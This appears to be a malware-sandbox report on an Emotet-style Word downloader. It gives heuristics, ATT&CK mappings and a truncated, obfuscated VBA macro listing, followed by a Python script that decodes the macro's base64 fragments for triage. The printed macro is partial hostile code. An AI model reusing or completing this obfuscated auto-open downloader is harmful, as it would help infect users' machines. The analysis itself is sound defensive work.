Verdict: MALICIOUS
Risk score: 224

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document carrying a VBA macro. The heuristics find an AutoOpen auto-execution entry point together with a CreateObject call, so the macro runs as soon as the document is opened with macros enabled and instantiates a COM object, the usual route for a macro to start a shell or script outside Word. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' places the file in a known document-downloader family, so the expected behaviour is to fetch and run a second-stage payload. The carved source (macros.bas) holds two modules, the document module bQPmaZXZlFkb and a standard module rnsCYjHvOzdLp that contains the function shown in the preview; it is heavily obfuscated. Select Case blocks keyed on apparently unset variables act as dead-code padding between calls to a string-slicing helper, IwsJzD, whose arguments are junk-padded chunks of base64-looking text and, in one call, the cleartext fragment 'seCUrEStRing -k (139..108)', which is consistent with PowerShell's ConvertTo-SecureString -Key idiom. Because the preview is truncated before the helper's definition and before the point where the chunks are assembled, the reconstructed command line and the download URLs cannot be recovered from this page.
Heuristics (8)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Doc.Malware.Emodldr-10025032-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen entry point: Word runs it automatically when the document is opened with macros enabled, so no further user action is needed |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject instantiates an arbitrary COM object (for example WScript.Shell or an HTTP request object), which is how a macro gets to run a command or download a file outside Word |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is a standard Office XML namespace identifier (DrawingML), not an address the macro contacts. |
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42235 bytes |

SHA-256: aaf7b19465ff42a6f86d04684231270613f29c77afefe2921c6d94b6545b96d4

Detection
- ClamAV: No threats found (the Doc.Malware signature above fired on the document itself, not on the carved source)
- Obfuscation or payload: likely. Carved artifact contains 20 long base64-like blob(s).

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "bQPmaZXZlFkb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rnsCYjHvOzdLp"
Function TVNTRQBORNh()
On Error Resume Next
Select Case TwsqY
Case 50364
rKvIqb = Hex(64568 - CSng(19794) - 50212 + ChrW(wiDbZm))
FiwGT = fuRlji
End Select
qAvwjAL = IwsJzD("iDUAMgBkADQANwBlADkAYgAzAGMAMQAyADIANQBhADMAYQA2ADcANwAwADcAZgBiADcAZABhAGIAZQAwADkAZgBlAGMANgBhADIAYwA3AGQAZQAwADcAMQAxADUAOABlADIAMQBiADUQw@AVjb", 2, 138)
Select Case AnMrBk
Case 75092
iAZAwR = Hex(2804 - CSng(65017) - 68363 + ChrW(tLhlub))
XRQNY = BcwcJW
End Select
Select Case ciGdb
Case 69009
PfKSs = Hex(53693 - CSng(52811) - 51135 + ChrW(GhiDpz))
hbEAw = XfvRHo
End Select
MiqhWNzi = IwsJzD("s%iCAOAdid", 5, 3)
Select Case kSvtj
Case 10576
qPjKKa = Hex(57550 - CSng(4853) - 2471 + ChrW(kQijYB))
jXjIi = bUnXw
End Select
Select Case FJtRI
Case 75291
MoKNtB = Hex(93125 - CSng(83157) - 1640 + ChrW(ASqWf))
aZiOh = VbSoBf
End Select
kBciEp = IwsJzD("lzIOXj%seCUrEStRing -k (139..108)))) ) )al", 8, 33)
Select Case UOEam
Case 73796
fqZTXO = Hex(27465 - CSng(54093) - 34698 + ChrW(zdatTr))
ZKbTiu = zRdjr
End Select
Select Case SlGtZ
Case 52550
rubCP = Hex(16 - CSng(20561) - 37421 + ChrW(IVwJc))
IQRkuW = ozPoOW
End Select
AJhDjZnVnZ = IwsJzD("qmYwGIAOAAyADEANwA4ADUAOABC6o7", 5, 22)
Select Case TjNMiz
Case 78358
mtoPa = Hex(19446 - CSng(29533) - 80906 + ChrW(WiTcq))
pjfsFi = alncAc
End Select
Select Case ZLZivo
Case 31907
iiPCC = Hex(10007 - CSng(14403) - 17336 + ChrW(rjlPw))
Mfjziz = wkZuz
End Select
DwicXjHF = IwsJzD("tYQA4ADYAMgBmADkAYwAxAGIAMQBlADgAYQBjAGYANwBkADcAMQBmADgANgBlAGEAZABiAGIAYgBlAGIAOQA4AGMAOAA4AGUAYwBhADUAYQBmAGEAYQAyADAANAA4AGMAZAA4AGYAZQA1ADEANgAzAGMAYgBmAGQAOQBkAGYAZQBhAGQAMgBhAGUAM46Wql", 2, 185)
Select Case jSoZGX
Case 13229
QTaUW = Hex(94022 - CSng(83516) - 24857 + ChrW(tWdjN))
PoiCd = fdHIbZ
End Select
Select Case ZQbBU
Case 16662
ZtiYTU = Hex(81590 - CSng(63687) - 65246 + ChrW(KbNGV))
sHXUY = isIDws
End Select
jCzrL = IwsJzD("@2C0vDEANQBmADkAZAAyADMANQA4AGQAZAAyAGQAYgAzAGEAYQBlADQAOABjADcAMwAwAGQANQBjADMANAAwZC", 6, 79)
Select Case zFADT
Case 71111
EtwJJs = Hex(61980 - CSng(19567) - 64101 + ChrW(KzEvi))
woVdOq = PVwUk
End Select
Select Case cmidV
Case 71837
vSiPJ = Hex(37839 - CSng(3177) - 39551 + ChrW(QRZWN))
cODIfj = jtrvuh
End Select
fAaJBIADK = IwsJzD("PVI5BtSNwA2ADUAMQA3ADcAYwBhADgAMQAwAGMAMQBjAv4", 8, 37)
Select Case rNkWl
Case 35986
UGVGw = Hex(76129 - CSng(91062) - 93150 + ChrW(wFLzJ))
aNFcD = oYOYUD
End Select
Select Case wFStL
Case 87846
HbOFi = Hex(86054 - CSng(80963) - 75789 + ChrW(cdIsk))
ZjTsRZ = JjcEV
End Select
bEhsHNqLXwk = IwsJzD("1l7uGMAZABiAGYAYgBjADkAOABkADAAMQBhADUAMAA2ADMAYwA4ADMAMgBjADkAMABiADgAOQAxADMAZgA4ADgAYwA1AGIAMgA2AGQAYQA1AGMANgBjADIANgBiADgANABkADYANwAyAGUANABjADYAYgBlAGYAMgA1AGQAYQBjADIAZQAwAGQANABjAGUAZAA2AKi", 5, 192)
Select Case rnWwrD
Case 46503
OUqaQ = Hex(42293 - CSng(53111) - 27942 + ChrW(scjBj))
ZTczjR = ciWBwT
End Select
Select Case Xpkzi
Case 76332
CXVzK = Hex(38389 - CSng(98583) - 77947 + ChrW(zfaBzX))
whnoRz = PjMUrv
End Select
PwERcYGLF = IwsJzD("CXDYANwBhADYANQBiADEANwA2ADcANgBiAGUAMAAzADIAMABmADUAMwA1ADEAYwA0ADkAMQA0ADQAOAA4AGUAMAB76E%2", 3, 86)
Select Case JTNcUU
Case 18683
Ftnpv = Hex(76596 - CSng(2908
... (truncated)
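The preview shows the decoding shape even though it is cut off: every call is IwsJzD("junk + payload + junk", start, length), and the slice the arguments select lands exactly on the meaningful text (33 characters from position 8 of the third call below yields "seCUrEStRing -k (139..108)))) ) )"). The helper's body lies outside the truncated listing, so its Mid-like semantics are an inference from those arguments, and that inference is what this added example assumes; it is not the analyzer's code. It re-implements the slicer under the hypothetical name vba_mid, pulls the call sites out of three lines copied from the preview, and recovers each base64-looking fragment's plaintext. Those fragments decode as UTF-16LE, the encoding PowerShell's -EncodedCommand expects, but because each one is a piece of a longer base64 string it may start mid-quantum, so the decoder tries all four alignments and keeps the one that yields ASCII text.

```python
import base64
import re

# Hypothetical re-implementation of the slicer the preview calls IwsJzD(s, start, length).
# The argument shape matches VBA's Mid(s, start, length): 1-indexed start, at most
# `length` characters, empty string once start runs past the end (assumed, see lead-in).
def vba_mid(s: str, start: int, length: int) -> str:
    if start < 1 or length < 0:
        raise ValueError("VBA Mid requires start >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


CALL_RE = re.compile(r'IwsJzD\("([^"]*)",\s*(\d+),\s*(\d+)\)')
B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')


def _ascii_printable_ratio(text: str) -> float:
    if not text:
        return 0.0
    return sum(1 for ch in text if 0x20 <= ord(ch) <= 0x7E) / len(text)


def decode_utf16le_b64_fragment(frag: str):
    """Decode a fragment of a longer base64 string whose plaintext is UTF-16LE.
    The fragment may begin mid-quantum, so drop 0..3 leading characters, cut the
    tail to whole 4-character quanta, and keep the alignment that yields the most
    ASCII-printable text. Returns (offset, text), or (None, "") if nothing fits."""
    best = (None, "", 0.0)
    for offset in range(4):
        body = frag[offset:]
        body = body[: len(body) - len(body) % 4]
        if len(body) < 4:
            continue
        try:
            raw = base64.b64decode(body, validate=True)
        except ValueError:
            continue
        # A misaligned slice of UTF-16LE text leaves an odd trailing byte; drop it.
        text = raw[: len(raw) - len(raw) % 2].decode("utf-16-le", errors="replace")
        score = _ascii_printable_ratio(text)
        if score > best[2]:
            best = (offset, text, score)
    return best[0], best[1]


def triage_slicer_calls(vba_source: str) -> list:
    """One record per IwsJzD call: the sliced string and, where it looks like
    base64, the recovered UTF-16LE text (None for cleartext or undecodable slices)."""
    records = []
    for m in CALL_RE.finditer(vba_source):
        blob, start, length = m.group(1), int(m.group(2)), int(m.group(3))
        sliced = vba_mid(blob, start, length)
        decoded = None
        if B64_RE.match(sliced):
            _, text = decode_utf16le_b64_fragment(sliced)
            decoded = text or None
        records.append({"start": start, "length": length, "sliced": sliced, "decoded": decoded})
    return records


# Three call sites copied verbatim from the preview above (the rest is truncated there).
SAMPLE_PREVIEW_LINES = '''qAvwjAL = IwsJzD("iDUAMgBkADQANwBlADkAYgAzAGMAMQAyADIANQBhADMAYQA2ADcANwAwADcAZgBiADcAZABhAGIAZQAwADkAZgBlAGMANgBhADIAYwA3AGQAZQAwADcAMQAxADUAOABlADIAMQBiADUQw@AVjb", 2, 138)
MiqhWNzi = IwsJzD("s%iCAOAdid", 5, 3)
kBciEp = IwsJzD("lzIOXj%seCUrEStRing -k (139..108)))) ) )al", 8, 33)
'''

if __name__ == "__main__":
    for rec in triage_slicer_calls(SAMPLE_PREVIEW_LINES):
        print(rec["start"], rec["length"], repr(rec["sliced"][:40]), "->", repr(rec["decoded"]))
```

The first call decodes to a run of hexadecimal digits ("2d47e9b3c1225a..."), the second is a three-character splinter too short to decode on its own, and the third is cleartext PowerShell syntax. Because obfuscators rarely assemble fragments in source order, concatenating the decoded pieces does not yield the command line; that needs the assembly code, which the truncated preview does not show.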